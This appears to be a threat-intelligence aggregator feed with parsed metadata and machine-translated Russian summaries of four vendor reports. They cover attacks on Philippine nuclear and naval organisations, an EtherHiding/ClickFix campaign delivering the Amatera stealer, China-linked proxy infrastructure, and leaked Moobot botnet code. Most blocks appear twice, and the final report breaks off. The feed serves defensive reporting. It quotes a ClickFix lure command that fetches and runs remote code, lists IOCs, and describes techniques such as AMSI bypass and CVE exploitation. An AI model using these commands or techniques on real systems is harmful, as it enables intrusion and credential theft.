#ParsedReport #CompletenessHigh
26-08-2026
Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities
https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor
Report completeness: High
Threats:
Sliver_c2_tool
Metasploit_tool
Mettle
Meterpreter_tool
Etherhiding_technique
Clickfix_technique
Victims:
Nuclear research, Marine engineering and shipbuilding, Philippine navy
Industry:
Financial, Petroleum, Critical_infrastructure, Maritime, Government
Geo:
Asia, Philippine, Philippines, Netherlands, Chinese, China
CVEs:
CVE-2024-28000 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: Unknown
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- litespeedtech litespeed_cache (<6.4)
CVE-2023-49105 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: True
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- owncloud owncloud_server (<10.13.1)
TTPs:
Tactics: 2
Technics: 11
IOCs:
IP: 3
Hash: 2
File: 24
Coin: 1
Url: 3
Soft:
WordPress, BitLocker, KeePass, SimpleHTTP, OpenSSH, Ubuntu, LiteSpeed
Crypto:
ethereum
Algorithms:
sha256, prng, pbkdf2, sha512
Functions:
mt_rand
Languages:
php, python
Platforms:
cross-platform
26-08-2026
Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities
https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor
Report completeness: High
Threats:
Sliver_c2_tool
Metasploit_tool
Mettle
Meterpreter_tool
Etherhiding_technique
Clickfix_technique
Victims:
Nuclear research, Marine engineering and shipbuilding, Philippine navy
Industry:
Financial, Petroleum, Critical_infrastructure, Maritime, Government
Geo:
Asia, Philippine, Philippines, Netherlands, Chinese, China
CVEs:
CVE-2024-28000 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: Unknown
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- litespeedtech litespeed_cache (<6.4)
CVE-2023-49105 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: True
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- owncloud owncloud_server (<10.13.1)
TTPs:
Tactics: 2
Technics: 11
IOCs:
IP: 3
Hash: 2
File: 24
Coin: 1
Url: 3
Soft:
WordPress, BitLocker, KeePass, SimpleHTTP, OpenSSH, Ubuntu, LiteSpeed
Crypto:
ethereum
Algorithms:
sha256, prng, pbkdf2, sha512
Functions:
mt_rand
Languages:
php, python
Platforms:
cross-platform
hunt.io
Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities
An exposed staging server reveals ownCloud pre-signed URL abuse against a Philippine nuclear agency and exploitation of a naval contractor's WordPress website.
CTT Report Hub
#ParsedReport #CompletenessHigh 26-08-2026 Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor Report…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Предположительно, операторы, говорящие на китайском языке, скомпрометировали организации Филиппин, связанные с государственным управлением, ядерными исследованиями и обороной, путем эксплуатации уязвимых систем ownCloud и WordPress. Они использовали собственные инструменты для обхода аутентификации, создания учетных записей администраторов, кражи конфиденциальных данных исследований, данных сотрудников, учетных данных и операционных данных, а также для подготовки к развертыванию ВПО, включая полезную нагрузку Mettle.
-----
Предположительно, операторы, говорящие на китайском языке, атаковали организации правительства Филиппин, организации в области ядерных исследований и организации, связанные с оборонным сектором, используя известные уязвимости и собственные инструменты. На открытом сервере по адресу 31.58.209.241:8000 размещались скрипты на Python, журналы передачи данных, украденные данные, инструменты для наступательной безопасности и загрузчик первого этапа в формате ELF под названием `multi_backupd` (SHA-256: `7447d0d0c34779d4c519823b39bf6ddc16d2b34a226b82ee69da6f5b4a77ad82`). Загрузчик устанавливал соединение с тем же IP-адресом на TCP-порту 8090 для получения полезной нагрузки Mettle.
Пять инструментов на Python эксплуатировали уязвимость CVE-2023-49105 в уязвимых развертываниях ownCloud. Скрипты генерировали предварительно подписанные URL, используя пустой секрет подписи PBKDF2, имитировали указанные учетные записи с помощью заголовка `OC-Credential` и получали файлы по протоколу WebDAV без аутентификации. Один из скриптов использовал запросы `PROPFIND` для перечисления каталогов и фиксировал загрузки локально. Комментарии, строки документации, сообщения журнала и каталоги вывода на упрощенном китайском языке указывали на оператора, говорящего на китайском языке.
Восстановленные каталоги промежуточного хранения содержали примерно 372 МБ данных, тогда как CSV-файл ссылался на объём украденных материалов около 9 ГБ. В собранные данные входили учётные записи, связанные с ядерными материалами, базы данных компонентов исследовательских реакторов, инвентаризация топлива, документы по радиационной безопасности, стратегические и ИТ-планы, персональные данные сотрудников (PII), записи о паспортах и поездках, а также хранилища учётных данных, содержащие материалы восстановления KeePass, AxCrypt и BitLocker. SQL-дамп системы ZKTeco BioTime объёмом 192 МБ содержал данные о сотрудниках, бейджах, отделах и журналах доступа, связанные с филиппинскими научными и исследовательскими организациями.
Филиппинская компания в области морского машиностроения и судостроения, связанная с ВМС, была скомпрометирована через её сайт на WordPress. Оператор эксплуатировал уязвимость CVE-2024-28000 в плагине LiteSpeed Cache, используя собственную реализацию на языке Go функций `mt_rand()` и MT19937 из PHP для брутфорса сидов хеша безопасности и создания учётной записи администратора. Отдельный инструмент на Python использовал интерфейс XML-RPC WordPress и словарь `rockyou.txt` для брутфорса учётной записи `admin`. Выведенные данные включали полную установку WordPress, медиафайлы, содержимое базы данных, хеши паролей, настройки плагинов и секретные ключи.
На том же сайте WordPress также присутствовало, предположительно, не связанное с ним заражение EtherHiding/ClickFix, в котором использовались размещенные в блокчейне HTML-файлы, постоянный сервис-воркер, доставка через `mshta` и VBS, а также сбор информации о жертве. Никаких доказательств, связывающих эту активность с предположительно китайскоязычным оператором, не обнаружено.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Предположительно, операторы, говорящие на китайском языке, скомпрометировали организации Филиппин, связанные с государственным управлением, ядерными исследованиями и обороной, путем эксплуатации уязвимых систем ownCloud и WordPress. Они использовали собственные инструменты для обхода аутентификации, создания учетных записей администраторов, кражи конфиденциальных данных исследований, данных сотрудников, учетных данных и операционных данных, а также для подготовки к развертыванию ВПО, включая полезную нагрузку Mettle.
-----
Предположительно, операторы, говорящие на китайском языке, атаковали организации правительства Филиппин, организации в области ядерных исследований и организации, связанные с оборонным сектором, используя известные уязвимости и собственные инструменты. На открытом сервере по адресу 31.58.209.241:8000 размещались скрипты на Python, журналы передачи данных, украденные данные, инструменты для наступательной безопасности и загрузчик первого этапа в формате ELF под названием `multi_backupd` (SHA-256: `7447d0d0c34779d4c519823b39bf6ddc16d2b34a226b82ee69da6f5b4a77ad82`). Загрузчик устанавливал соединение с тем же IP-адресом на TCP-порту 8090 для получения полезной нагрузки Mettle.
Пять инструментов на Python эксплуатировали уязвимость CVE-2023-49105 в уязвимых развертываниях ownCloud. Скрипты генерировали предварительно подписанные URL, используя пустой секрет подписи PBKDF2, имитировали указанные учетные записи с помощью заголовка `OC-Credential` и получали файлы по протоколу WebDAV без аутентификации. Один из скриптов использовал запросы `PROPFIND` для перечисления каталогов и фиксировал загрузки локально. Комментарии, строки документации, сообщения журнала и каталоги вывода на упрощенном китайском языке указывали на оператора, говорящего на китайском языке.
Восстановленные каталоги промежуточного хранения содержали примерно 372 МБ данных, тогда как CSV-файл ссылался на объём украденных материалов около 9 ГБ. В собранные данные входили учётные записи, связанные с ядерными материалами, базы данных компонентов исследовательских реакторов, инвентаризация топлива, документы по радиационной безопасности, стратегические и ИТ-планы, персональные данные сотрудников (PII), записи о паспортах и поездках, а также хранилища учётных данных, содержащие материалы восстановления KeePass, AxCrypt и BitLocker. SQL-дамп системы ZKTeco BioTime объёмом 192 МБ содержал данные о сотрудниках, бейджах, отделах и журналах доступа, связанные с филиппинскими научными и исследовательскими организациями.
Филиппинская компания в области морского машиностроения и судостроения, связанная с ВМС, была скомпрометирована через её сайт на WordPress. Оператор эксплуатировал уязвимость CVE-2024-28000 в плагине LiteSpeed Cache, используя собственную реализацию на языке Go функций `mt_rand()` и MT19937 из PHP для брутфорса сидов хеша безопасности и создания учётной записи администратора. Отдельный инструмент на Python использовал интерфейс XML-RPC WordPress и словарь `rockyou.txt` для брутфорса учётной записи `admin`. Выведенные данные включали полную установку WordPress, медиафайлы, содержимое базы данных, хеши паролей, настройки плагинов и секретные ключи.
На том же сайте WordPress также присутствовало, предположительно, не связанное с ним заражение EtherHiding/ClickFix, в котором использовались размещенные в блокчейне HTML-файлы, постоянный сервис-воркер, доставка через `mshta` и VBS, а также сбор информации о жертве. Никаких доказательств, связывающих эту активность с предположительно китайскоязычным оператором, не обнаружено.
#ParsedReport #CompletenessHigh
27-08-2026
EtherHiding in the Browser: ClickFix Chain Ends in Amatera
https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera
Report completeness: High
Threats:
Etherhiding_technique
Clickfix_technique
Amatera_stealer
Polyglot_technique
Emmenhtal
Errtraffic
Dead_drop_technique
Lolbin_technique
Acr_stealer
Acridrain
Victims:
Wordpress sites, Logged out website visitors
Industry:
Financial
TTPs:
Tactics: 2
Technics: 0
ChatGPT TTPs:
T1027, T1027.003, T1027.013, T1036.005, T1041, T1053.005, T1059.001, T1059.003, T1059.005, T1071.001, have more...
IOCs:
Url: 6
File: 18
Coin: 1
Domain: 4
Path: 2
Hash: 6
Soft:
WordPress, macOS, Chrome
Crypto:
ethereum
Algorithms:
ecdh, rc4, base64, aes-gcm, sha256, md5
Functions:
skipWaiting, getActiveScripts, getDemoPage, getScript
Languages:
vbscript, php, powershell
Platforms:
x86
Links:
27-08-2026
EtherHiding in the Browser: ClickFix Chain Ends in Amatera
https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera
Report completeness: High
Threats:
Etherhiding_technique
Clickfix_technique
Amatera_stealer
Polyglot_technique
Emmenhtal
Errtraffic
Dead_drop_technique
Lolbin_technique
Acr_stealer
Acridrain
Victims:
Wordpress sites, Logged out website visitors
Industry:
Financial
TTPs:
Tactics: 2
Technics: 0
ChatGPT TTPs:
do not use without manual checkT1027, T1027.003, T1027.013, T1036.005, T1041, T1053.005, T1059.001, T1059.003, T1059.005, T1071.001, have more...
IOCs:
Url: 6
File: 18
Coin: 1
Domain: 4
Path: 2
Hash: 6
Soft:
WordPress, macOS, Chrome
Crypto:
ethereum
Algorithms:
ecdh, rc4, base64, aes-gcm, sha256, md5
Functions:
skipWaiting, getActiveScripts, getDemoPage, getScript
Languages:
vbscript, php, powershell
Platforms:
x86
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCsNetskope
EtherHiding in the Browser: ClickFix Chain Ends in Amatera
Netskope Threat Labs has been tracking a WordPress mass-compromise campaign affecting hundreds of sites. On each one, a rogue must-use plugin registers a
CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 EtherHiding in the Browser: ClickFix Chain Ends in Amatera https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera Report completeness: High Threats: Etherhiding_technique Clickfix_technique…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания, нацеленная на WordPress, использует постоянный Service Worker для внедрения приманки ClickFix, которая побуждает пользователей Windows выполнить команду `mshta`. Это запускает цепочку Emmenhtal в памяти, основанную на PowerShell, которая в конечном итоге развертывает стиллер информации Amatera/AcridRain, выгружающий учетные данные и системные данные по TLS.
-----
Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни сайтов вредоносным must-use-плагином, который регистрирует постоянный Service Worker. Этот worker перехватывает управление страницами посетителей, удаляет защитные механизмы Content-Security-Policy и внедряет скрипт исключительно для незарегистрированных пользователей. Для обхода администраторов исключаются пути входа в WordPress и административные разделы, аутентифицированные сессии, а также управляемый оператором тестовый cookie. Поскольку Service Worker сохраняется в браузерах даже после очистки на стороне сервера, для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.
Вставленный скрипт использует ethers.js для запроса к смарт-контракту только для чтения в блокчейне Base по адресу `0x58460d0b3d4d6b03761c89120393c0c676676496`. Контракт хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA, реализуя EtherHiding с помощью механизма on-chain dead-drop. Приманка инструктирует пользователей Windows скопировать и выполнить команду `mshta http://timelevel12[.\]com/big` через диалоговое окно «Выполнить», в то время как пользователи других операционных систем получают безвредную отвлекающую информацию. Эта техника ClickFix зависит от ручного выполнения команды жертвой, что позволяет избежать стандартного сканирования вложений или загрузок.
HTA-нагрузка декодирует команду, создающую скрытую запланированную задачу с именем `serviceerg` через COM-интерфейс Schedule.Service. Задача запускает PowerShell с использованием замаскированного пути с подстановочным символом и закодированной команды. Этап PowerShell обходит Constrained Language Mode, модифицирует `amsiContext` для отключения сканирования AMSI, выполняет профилирование хоста и исполняет последующий код в памяти. Он загружает загрузчик Emmenhtal с домена `gpuh[.\]gravityzone[.\]army`, используя User-Agent, имитирующий браузер. Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на `i.ibb[.\]co`, и загружает её в память как PE-файл с помощью рефлексивной загрузки, не оставляя исполняемого файла на диске.
Финальный полезный груз — Amatera, также известный как ребрендинг ACR Stealer/AcridRain, замаскированный через метаданные под `WPA.exe`. Он крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с `gw[.\]proxyvector[.\]cc` по TLS. Разрешение DNS выполняется через провайдеры DNS-over-HTTPS, включая Google и Cloudflare, что скрывает запросы к C2 внутри зашифрованного DNS-трафика. Специалисты по защите должны отслеживать указанную инфраструктуру, активность смарт-контрактов в блокчейне, подозрительное выполнение `mshta`, скрытые запланированные задачи, вмешательство в AMSI, регистрацию Service Worker и трафик браузера к конечным точкам Base RPC.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания, нацеленная на WordPress, использует постоянный Service Worker для внедрения приманки ClickFix, которая побуждает пользователей Windows выполнить команду `mshta`. Это запускает цепочку Emmenhtal в памяти, основанную на PowerShell, которая в конечном итоге развертывает стиллер информации Amatera/AcridRain, выгружающий учетные данные и системные данные по TLS.
-----
Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни сайтов вредоносным must-use-плагином, который регистрирует постоянный Service Worker. Этот worker перехватывает управление страницами посетителей, удаляет защитные механизмы Content-Security-Policy и внедряет скрипт исключительно для незарегистрированных пользователей. Для обхода администраторов исключаются пути входа в WordPress и административные разделы, аутентифицированные сессии, а также управляемый оператором тестовый cookie. Поскольку Service Worker сохраняется в браузерах даже после очистки на стороне сервера, для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.
Вставленный скрипт использует ethers.js для запроса к смарт-контракту только для чтения в блокчейне Base по адресу `0x58460d0b3d4d6b03761c89120393c0c676676496`. Контракт хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA, реализуя EtherHiding с помощью механизма on-chain dead-drop. Приманка инструктирует пользователей Windows скопировать и выполнить команду `mshta http://timelevel12[.\]com/big` через диалоговое окно «Выполнить», в то время как пользователи других операционных систем получают безвредную отвлекающую информацию. Эта техника ClickFix зависит от ручного выполнения команды жертвой, что позволяет избежать стандартного сканирования вложений или загрузок.
HTA-нагрузка декодирует команду, создающую скрытую запланированную задачу с именем `serviceerg` через COM-интерфейс Schedule.Service. Задача запускает PowerShell с использованием замаскированного пути с подстановочным символом и закодированной команды. Этап PowerShell обходит Constrained Language Mode, модифицирует `amsiContext` для отключения сканирования AMSI, выполняет профилирование хоста и исполняет последующий код в памяти. Он загружает загрузчик Emmenhtal с домена `gpuh[.\]gravityzone[.\]army`, используя User-Agent, имитирующий браузер. Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на `i.ibb[.\]co`, и загружает её в память как PE-файл с помощью рефлексивной загрузки, не оставляя исполняемого файла на диске.
Финальный полезный груз — Amatera, также известный как ребрендинг ACR Stealer/AcridRain, замаскированный через метаданные под `WPA.exe`. Он крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с `gw[.\]proxyvector[.\]cc` по TLS. Разрешение DNS выполняется через провайдеры DNS-over-HTTPS, включая Google и Cloudflare, что скрывает запросы к C2 внутри зашифрованного DNS-трафика. Специалисты по защите должны отслеживать указанную инфраструктуру, активность смарт-контрактов в блокчейне, подозрительное выполнение `mshta`, скрытые запланированные задачи, вмешательство в AMSI, регистрацию Service Worker и трафик браузера к конечным точкам Base RPC.
#ParsedReport #CompletenessMedium
26-08-2026
Inside China-nexus cyber espionage infrastructure
https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model
Report completeness: Medium
Threats:
Fast_labyrinth_tool
Qscan_tool
Qtrouter
Qtproxy_tool
Raptor_train
Kv-botnet
Supply_chain_technique
Victims:
Research universities, Government, Defense, Public sector, Military, Healthcare, Critical infrastructure, Energy supply chains, Financial services, Enterprise software, have more...
Industry:
Military, Education, Telco, Energy, Critical_infrastructure, Healthcare, Government, Logistic, Iot, Aerospace
Geo:
Chinese, Asia-pacific, China
ChatGPT TTPs:
T1001, T1046, T1090.002, T1573, T1592.002
IOCs:
Domain: 18
IP: 5
Soft:
ORB network, RabbitMQ, Redis
Links:
26-08-2026
Inside China-nexus cyber espionage infrastructure
https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model
Report completeness: Medium
Threats:
Fast_labyrinth_tool
Qscan_tool
Qtrouter
Qtproxy_tool
Raptor_train
Kv-botnet
Supply_chain_technique
Victims:
Research universities, Government, Defense, Public sector, Military, Healthcare, Critical infrastructure, Energy supply chains, Financial services, Enterprise software, have more...
Industry:
Military, Education, Telco, Energy, Critical_infrastructure, Healthcare, Government, Logistic, Iot, Aerospace
Geo:
Chinese, Asia-pacific, China
ChatGPT TTPs:
do not use without manual checkT1001, T1046, T1090.002, T1573, T1592.002
IOCs:
Domain: 18
IP: 5
Soft:
ORB network, RabbitMQ, Redis
Links:
https://github.com/blacklotuslabs/IOCs/blob/main/Quartermaster\_IOCs.txtLumen
Inside China-nexus cyber espionage infrastructure
Black Lotus Labs and the FBI uncovered China-nexus infrastructure used to hide cyber espionage, showing how early detection helps protect customers.
CTT Report Hub
#ParsedReport #CompletenessMedium 26-08-2026 Inside China-nexus cyber espionage infrastructure https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model Report completeness: Medium Threats: Fast_labyrinth_tool…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Китайский «квартермейстер» обеспечивает злоумышленников инфраструктурой для шпионажа, объединяя разведку с помощью QScan, маршрутизацию через прокси Fast Labyrinth и администрирование с использованием QTRouter/QTProxy. Для сокрытия трафика используются коммерческие китайские прокси-сервисы и ротация узлов YotoCloud, при этом сканирование уязвимых систем может предшествовать интерактивному доступу, перемещению внутри компании, закреплению или краже данных.
-----
В отчете описывается инфраструктурный провайдер кибершпионажа с привязкой к Китаю, действующий в роли «квартельмейстера» для нескольких злоумышленников нижестоящего уровня. Его сервисный слой объединяет разведку, коммерческий прокси-доступ, маршрутизацию трафика и административный контроль. Инфраструктура включает QScan для профилирования целей, Fast Labyrinth для маскированных коммуникаций, устройства QTRouter для аутентифицированного доступа и QTProxy для управления прокси-узлами и построения релейных путей.
Группа Fast Labyrinth использует коммерческие китайские прокси-сервисы «Airport», в частности fastlink.ws, вместо создания сети ORB исключительно на основе скомпрометированных устройств. Трафик маршрутизируется через выбранные узлы исходящего трафика с высокой пропускной способностью, связанные с доменами `flanycast-*.yotocloud.com` и `flnode-*.yotocloud.com`. Эти узлы используют коммерческую транзитную инфраструктуру, ротацию пулов IP-адресов и объемы потребительского трафика для сокрытия разведывательной деятельности и обхода статических IP-ориентированных средств защиты. Сеть поддерживает как предварительно настроенные маршруты, так и кастомные пути к целевым организациям.
Операторы получают доступ к прокси-сети и управляют ею с помощью аппаратного обеспечения QTRouter и административной плоскости QTProxy. Соответствующая инфраструктура включает `www.qtproxy.xyz`, `qt-proxy.org`, `jump.qt-proxy.org` и `instantmessagehub.tech`. Административные сессии наблюдались из адресного пространства China Telecom и China Unicom в Нанкине, при этом соединения также затрагивали прокси-узлы YotoCloud, что указывает на тестирование и калибровку инфраструктуры перед использованием клиентами.
QScan функционирует как отдельный фреймворк разведки, использующий брокер задач Celery/RabbitMQ на `mq-task.qt-proxy.org` или связанной инфраструктуре `mq-task-qt-team.com`, глобально распределённых рабочих узлов сканера и бэкенд результатов на базе Redis на `mq-result.qt-proxy.org` или `mq-result-qt-team.com`. Рабочие узлы ротируются по сетям /24 с циклом примерно в 30 дней и собирают открытые порты, баннеры приложений, отпечатки операционных систем и данные конфигурации.
Сканирование следовало двум паттернам: широкая разведка периметра военных, государственных и оборонных сетей, а также более тихий анализ на уровне приложений в отношении организаций в сферах исследований, здравоохранения, энергетики, финансов, инфраструктуры и программного обеспечения. Многие цели QScan впоследствии получили двунаправленные соединения Fast Labyrinth, что указывает на переход от разведки к интерактивной эксплуатации, перемещению внутри компании, созданию постоянных скрытых каналов связи или краже данных. Среди целевых систем были обнаружены открытые среды разработки, не обновлённое облачное хранилище, интерфейсы удалённого доступа и инфраструктура, связанная с учётными данными.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Китайский «квартермейстер» обеспечивает злоумышленников инфраструктурой для шпионажа, объединяя разведку с помощью QScan, маршрутизацию через прокси Fast Labyrinth и администрирование с использованием QTRouter/QTProxy. Для сокрытия трафика используются коммерческие китайские прокси-сервисы и ротация узлов YotoCloud, при этом сканирование уязвимых систем может предшествовать интерактивному доступу, перемещению внутри компании, закреплению или краже данных.
-----
В отчете описывается инфраструктурный провайдер кибершпионажа с привязкой к Китаю, действующий в роли «квартельмейстера» для нескольких злоумышленников нижестоящего уровня. Его сервисный слой объединяет разведку, коммерческий прокси-доступ, маршрутизацию трафика и административный контроль. Инфраструктура включает QScan для профилирования целей, Fast Labyrinth для маскированных коммуникаций, устройства QTRouter для аутентифицированного доступа и QTProxy для управления прокси-узлами и построения релейных путей.
Группа Fast Labyrinth использует коммерческие китайские прокси-сервисы «Airport», в частности fastlink.ws, вместо создания сети ORB исключительно на основе скомпрометированных устройств. Трафик маршрутизируется через выбранные узлы исходящего трафика с высокой пропускной способностью, связанные с доменами `flanycast-*.yotocloud.com` и `flnode-*.yotocloud.com`. Эти узлы используют коммерческую транзитную инфраструктуру, ротацию пулов IP-адресов и объемы потребительского трафика для сокрытия разведывательной деятельности и обхода статических IP-ориентированных средств защиты. Сеть поддерживает как предварительно настроенные маршруты, так и кастомные пути к целевым организациям.
Операторы получают доступ к прокси-сети и управляют ею с помощью аппаратного обеспечения QTRouter и административной плоскости QTProxy. Соответствующая инфраструктура включает `www.qtproxy.xyz`, `qt-proxy.org`, `jump.qt-proxy.org` и `instantmessagehub.tech`. Административные сессии наблюдались из адресного пространства China Telecom и China Unicom в Нанкине, при этом соединения также затрагивали прокси-узлы YotoCloud, что указывает на тестирование и калибровку инфраструктуры перед использованием клиентами.
QScan функционирует как отдельный фреймворк разведки, использующий брокер задач Celery/RabbitMQ на `mq-task.qt-proxy.org` или связанной инфраструктуре `mq-task-qt-team.com`, глобально распределённых рабочих узлов сканера и бэкенд результатов на базе Redis на `mq-result.qt-proxy.org` или `mq-result-qt-team.com`. Рабочие узлы ротируются по сетям /24 с циклом примерно в 30 дней и собирают открытые порты, баннеры приложений, отпечатки операционных систем и данные конфигурации.
Сканирование следовало двум паттернам: широкая разведка периметра военных, государственных и оборонных сетей, а также более тихий анализ на уровне приложений в отношении организаций в сферах исследований, здравоохранения, энергетики, финансов, инфраструктуры и программного обеспечения. Многие цели QScan впоследствии получили двунаправленные соединения Fast Labyrinth, что указывает на переход от разведки к интерактивной эксплуатации, перемещению внутри компании, созданию постоянных скрытых каналов связи или краже данных. Среди целевых систем были обнаружены открытые среды разработки, не обновлённое облачное хранилище, интерфейсы удалённого доступа и инфраструктура, связанная с учётными данными.
#ParsedReport #CompletenessMedium
27-08-2026
Open Directory Exposes Moobot Source Code and Ongoing Activity Post 2024 Court-Authorized Disruption
https://censys.com/blog/open-directory-exposes-moobot-source-code-and-activity/
Report completeness: Medium
Actors/Campaigns:
Fancy_bear (motivation: cyber_criminal)
Threats:
Moobot
Flooder
Mirai
Disttrack
Wannacry
Victims:
China mobile, Chinese citizens
Industry:
Iot, Government
Geo:
Chinese, Russian, Asia, China
ChatGPT TTPs:
T1059.006, T1071.001, T1095, T1105, T1498.001, T1571, T1589
IOCs:
IP: 6
File: 3
Domain: 1
Url: 1
Soft:
Minecraft, Linux, Android
Win API:
ARC
Languages:
python, php
27-08-2026
Open Directory Exposes Moobot Source Code and Ongoing Activity Post 2024 Court-Authorized Disruption
https://censys.com/blog/open-directory-exposes-moobot-source-code-and-activity/
Report completeness: Medium
Actors/Campaigns:
Fancy_bear (motivation: cyber_criminal)
Threats:
Moobot
Flooder
Mirai
Disttrack
Wannacry
Victims:
China mobile, Chinese citizens
Industry:
Iot, Government
Geo:
Chinese, Russian, Asia, China
ChatGPT TTPs:
do not use without manual checkT1059.006, T1071.001, T1095, T1105, T1498.001, T1571, T1589
IOCs:
IP: 6
File: 3
Domain: 1
Url: 1
Soft:
Minecraft, Linux, Android
Win API:
ARC
Languages:
python, php
Censys
Open Directory Exposes Moobot Source Code and Ongoing Activity Post 2024 Court-Authorized Disruption - Censys
New Censys ARC research examines an exposed server containing Moobot botnet source code, active attack records, DoS tooling, and a fraudulent identity verification service.
CTT Report Hub
#ParsedReport #CompletenessMedium 27-08-2026 Open Directory Exposes Moobot Source Code and Ongoing Activity Post 2024 Court-Authorized Disruption https://censys.com/blog/open-directory-exposes-moobot-source-code-and-activity/ Report completeness: Medium…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Некорректно настроенный сервер раскрыл исходный код и операционные данные Moobot, что выявило возможности ботнета для IoT-устройств, основанного на Mirai, спящие функции HTTP-загрузки и выполнения, а также признаки продолжающейся активности после его нейтрализации в 2024 году. На этом же сервере размещались независимая панель DDoS, нацеленная на серверы Minecraft, и мошеннический китайский сервис верификации личности.
-----
Некорректно настроенный открытый каталог на 86.53.111.212:8080 привел к утечке исходного кода и операционных данных, связанных с Moobot — ботнетом для IoT-устройств, производным от Mirai, а также независимых инструментов для проведения атак на отказ в обслуживании и мошеннического китайского сервиса верификации личности. Утеченные материалы были собраны 30 июля 2026 года и включали журналы атак, свидетельствующие о том, что несколько сервисов оставались активными после санкционированного судом в феврале 2024 года нарушения работы ботнета Moobot.
Восстановленный исходный код Moobot содержит идентификаторы, связанные с известными образцами, включая заголовок регистрации C2 0x336699 и 32-символьный случайный строковый сид `w5q6he3dbrsgmclkiu4to18npavj702f`. Moobot использует собственный протокол C2, аналогичный протоколу Mirai, и поддерживает команды для управления зараженными устройствами и запуска сетевых наводнений (flood-атак). Исходный код также содержит две ранее не задокументированные подпрограммы загрузки и выполнения. Хотя они находятся в неактивном состоянии — одна закомментирована, а другая никогда не вызывается, — эта функциональность позволяла бы оператору C2 направлять зараженные устройства на загрузку ELF-бинарного файла по HTTP, сохранение его в виде исполняемого файла, переименование, создание дочернего процесса (fork) и выполнение. Эта возможность рассматривается как правдоподобный механизм для зафиксированного переиспользования Moobot группировкой APT28, хотя способ получения доступа остается неизвестным.
В каталоге также содержалась StresD Pro+ — панель управления DDoS-атаками на базе Node.js/Express и WebSocket, с отдельными сервисами для пользователей и администраторов. Записи панели фиксировали 32 атаки, в которых участвовали шесть клиентов, на дату сбора данных. В отличие от Moobot, панель запускает локальный Python-скрипт, который генерирует трафик непосредственно с сервера промежуточного хранения (staging server), что превращает активность в атаку типа «отказ в обслуживании» (DoS), а не в распределённую атаку. Скрипт нацелен на серверы Minecraft Bedrock Edition, выполняет рукопожатие RakNet и отправляет некорректные инкапсулированные пакеты и рандомизированные последовательности NACK.
Отдельный сервис на порту 3000 имитировал китайскую систему верификации личности, используемую органами общественной безопасности. Исходный код показал, что отправляемые имена и 18-значные номера национальных удостоверений личности Китая передавались стороннему API, а ответ возвращался в виде результата о совпадении или поддельной личности. В ходе мониторинга позже был выявлен активный C2 Moobot по адресу 162.141.92.192:14123, связанный с более чем 500 задачами атак короткой продолжительности в августе 2026 года.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Некорректно настроенный сервер раскрыл исходный код и операционные данные Moobot, что выявило возможности ботнета для IoT-устройств, основанного на Mirai, спящие функции HTTP-загрузки и выполнения, а также признаки продолжающейся активности после его нейтрализации в 2024 году. На этом же сервере размещались независимая панель DDoS, нацеленная на серверы Minecraft, и мошеннический китайский сервис верификации личности.
-----
Некорректно настроенный открытый каталог на 86.53.111.212:8080 привел к утечке исходного кода и операционных данных, связанных с Moobot — ботнетом для IoT-устройств, производным от Mirai, а также независимых инструментов для проведения атак на отказ в обслуживании и мошеннического китайского сервиса верификации личности. Утеченные материалы были собраны 30 июля 2026 года и включали журналы атак, свидетельствующие о том, что несколько сервисов оставались активными после санкционированного судом в феврале 2024 года нарушения работы ботнета Moobot.
